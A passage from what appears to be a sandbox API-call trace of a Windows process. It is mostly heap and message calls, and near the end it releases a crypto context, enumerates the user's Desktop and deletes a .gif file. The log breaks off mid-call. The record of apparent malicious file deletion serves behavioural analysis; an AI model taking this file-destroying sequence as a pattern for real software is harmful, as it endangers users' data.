out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.798] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.799] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.799] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.799] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.800] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.800] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.802] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.802] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.802] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.802] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.802] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.802] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.802] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.802] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.802] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.802] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.803] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0165.803] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.803] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.803] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.804] FreeLibrary (hLibModule=0x74d40000) returned 1 [0165.804] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.804] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.805] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.806] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.807] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.807] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0165.808] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gXTZQTDkC2czFZpWnC.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif", lpFilePart=0x8bedfc*="gXTZQTDkC2czFZpWnC.gif") returned 0x3c [0165.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0165.808] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gxtzqtdkc2czfzpwnc.gif")) returned 0x20 [0165.808] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9846620, ftCreationTime.dwHighDateTime=0x1d4c974, ftLastAccessTime.dwLowDateTime=0xfa86340, ftLastAccessTime.dwHighDateTime=0x1d4d003, ftLastWriteTime.dwLowDateTime=0xfa86340, ftLastWriteTime.dwHighDateTime=0x1d4d003, nFileSizeHigh=0x0, nFileSizeLow=0x5d6d, dwReserved0=0x4d, dwReserved1=0x4, cFileName="gXTZQTDkC2czFZpWnC.gif", cAlternateFileName="GXTZQT~1.GIF")) returned 0xaa5660 [0165.809] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gxtzqtdkc2czfzpwnc.gif")) returned 1 [0165.815] FindNextFileW (in: 